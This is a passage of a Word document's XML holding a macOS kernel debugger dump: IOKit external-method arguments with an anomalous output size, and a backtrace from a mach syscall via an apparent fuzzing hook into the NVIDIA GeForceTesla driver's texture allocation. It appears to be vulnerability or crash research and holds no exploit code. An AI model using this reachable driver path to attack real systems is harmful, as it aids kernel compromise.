        <w:t>0x00007fc841fc8040:   (const uint64_t *) scalarInput = 0xffffff802931b5f4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8048:   (uint32_t) scalarInputCount = 8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8050:   (const void *) structureInput = 0xffffff802931b638</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8058:   (uint32_t) structureInputSize = 4096</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8060:   (IOMemoryDescriptor *) structureInputDescriptor = 0x0000000000000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8068:   (uint64_t *) scalarOutput = 0xffffff913564bd80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8070:   (uint32_t) scalarOutputCount = 16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8078:   (void *) structureOutput = 0xffffff8031185600</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8080:   (uint32_t) structureOutputSize = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>scalar(0xffffff802a28af00):   (IOGeneralMemoryDescriptor *) structureOutputDescriptor = 0xffffff802a28af00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8090:   (uint32_t) structureOutputDescriptorSize = 4294967295</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8094:   (uint32_t) __reservedA = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8098:   (OSObject **) structureVariableOutputData = 0x0000000000000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80a0:   (uint32_t [30]) __reserved = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80a0:     (uint32_t) [0] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80a4:     (uint32_t) [1] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80a8:     (uint32_t) [2] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80ac:     (uint32_t) [3] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80b0:     (uint32_t) [4] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80b4:     (uint32_t) [5] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80b8:     (uint32_t) [6] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80bc:     (uint32_t) [7] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80c0:     (uint32_t) [8] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80c4:     (uint32_t) [9] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0x00007fc841fc80c8:     (uint32_t) [10] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80cc:     (uint32_t) [11] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80d0:     (uint32_t) [12] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80d4:     (uint32_t) [13] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80d8:     (uint32_t) [14] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80dc:     (uint32_t) [15] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80e0:     (uint32_t) [16] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80e4:     (uint32_t) [17] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80e8:     (uint32_t) [18] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80ec:     (uint32_t) [19] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80f0:     (uint32_t) [20] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80f4:     (uint32_t) [21] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80f8:     (uint32_t) [22] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc80fc:     (uint32_t) [23] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8100:     (uint32_t) [24] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8104:     (uint32_t) [25] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8108:     (uint32_t) [26] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc810c:     (uint32_t) [27] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8110:     (uint32_t) [28] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc841fc8114:     (uint32_t) [29] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">0xffffff811c9e38f0 0xffffff7f879a2eae GeForceTesla`nvTextureBuffer::AllocateVirtualAddress(bool, unsigned int, unsigned int, unsigned int) + 0x1ca </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">0xffffff811c9e3930 0xffffff7f879a3c5c GeForceTesla`nvTextureBuffer::SetupVirtualAddresses(nvVirtualAddressSpaceTesla*, unsigned int, unsigned int, unsigned int) + 0xd6 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">0xffffff811c9e3960 0xffffff7f8799f213 GeForceTesla`nvTextureBuffer::Initialize(NVKernel*, nvSharedTesla*, nvVirtualAddressSpaceTesla*, VendorNewTextureDataRec*) + 0x297 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">0xffffff811c9e39b0 0xffffff7f879823a4 GeForceTesla`nvDeviceTesla::NewTexture(VendorNewTextureDataRec*, sIONewTextureReturnData*, unsigned long long, unsigned long long*) + 0x252 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">0xffffff811c9e39e0 0xffffff8005ce40d2 shim_io_connect_method_structureI_structureO((IOExternalMethod *) method = &lt;&gt;, , (IOService *) object = &lt;&gt;, , (char *) input = &lt;&gt;, , (mach_msg_type_number_t) inputCount = &lt;&gt;, , (char *) output = &lt;&gt;, , (IOByteCount *) outputCount = &lt;&gt;, ) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">0xffffff811c9e3a40 0xffffff8005ce4cc9 IOUserClient::externalMethod(unsigned int, IOExternalMethodArguments*, IOExternalMethodDispatch*, OSObject*, void*)((IOUserClient *) this = &lt;&gt;, , (uint32_t) selector = &lt;&gt;, , (IOExternalMethodArguments *) args = 0xffffff811c9e3a60, (IOExternalMethodDispatch *) dispatch = &lt;&gt;, , (OSObject *) target = &lt;&gt;, , (void *) reference = &lt;&gt;, ) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">0xffffff811c9e3b80 0xffffff8005ce2443 is_io_connect_method((io_connect_t) connection = 0xffffff801bc4f400, (uint32_t) selector = 5, (io_user_scalar_t *) scalar_input = &lt;&gt;, , (mach_msg_type_number_t) scalar_inputCnt = &lt;&gt;, , (char *) inband_input = &lt;&gt;, , (mach_msg_type_number_t) inband_inputCnt = &lt;&gt;, , (mach_vm_address_t) ool_input = &lt;&gt;, , (mach_vm_size_t) ool_input_size = &lt;no location, value may have been optimized out&gt;, , (char *) inband_output = &lt;no location, value may have been optimized out&gt;, , (mach_msg_type_number_t *) inband_outputCnt = &lt;no location, value may have been optimized out&gt;, , (io_user_scalar_t *) scalar_output = &lt;&gt;, , (mach_msg_type_number_t *) scalar_outputCnt = &lt;no location, value may have been optimized out&gt;, , (mach_vm_address_t) ool_output = &lt;&gt;, , (mach_vm_size_t *) ool_output_size = &lt;&gt;, ) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">0xffffff811c9e3d00 0xffffff7f884aca34 trampline_is_io_connect_method((io_connect_t) connection = 0xffffff801bc4f400, (uint32_t) selector = 5, (io_user_scalar_t *) scalar_input = 0xffffff8019d8eea8, (mach_msg_type_number_t) scalar_inputCnt = 0, (char *) inband_input = 0xffffff8019d8eeac "\b", (mach_msg_type_number_t) inband_inputCnt = 92, (mach_vm_address_t) ool_input = 0, (mach_vm_size_t) ool_input_size = 0, (char *) inband_output = 0xffffff801bfd9600 "", (mach_msg_type_number_t *) inband_outputCnt = 0xffffff801bfd95fc, (io_user_scalar_t *) scalar_output = 0xffffff811c9e3d60, </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">(mach_msg_type_number_t *) scalar_outputCnt = 0xffffff811c9e3d5c, (mach_vm_address_t) ool_output = 0, (mach_vm_size_t *) ool_output_size = 0xffffff8019d8ef28) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">0xffffff811c9e3e10 0xffffff80057b7f27 _Xio_connect_method((mach_msg_header_t *) InHeadP = 0xffffff801bc4f400, (mach_msg_header_t *) OutHeadP = 0xffffff801bfd95d0) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">0xffffff811c9e3e40 0xffffff80056e92ac ipc_kobject_server((ipc_kmsg_t) request = 0xffffff8019d8ee00) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">0xffffff811c9e3e90 0xffffff80056c5a23 ipc_kmsg_send((ipc_kmsg_t) kmsg = &lt;&gt;, , (mach_msg_option_t) option = 3, (mach_msg_timeout_t) send_timeout = 0) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">0xffffff811c9e3f10 0xffffff80056ddc8d mach_msg_overwrite_trap((mach_msg_overwrite_trap_args *) args = &lt;&gt;, ) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">0xffffff811c9e3fb0 0xffffff80057da78a mach_call_munger64((x86_saved_state_t *) state = 0xffffff801aecd8c0) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">0x0000000000000000 0xffffff800580e666 kernel.development`hndl_mach_scall64 + 0x16 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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kern_return_t is_io_connect_method</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>io_connect_t connection,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>uint32_t selector,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>io_scalar_inband64_t scalar_input,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>mach_msg_type_number_t scalar_inputCnt,</w:t>
      </w:r>
    </w:p>
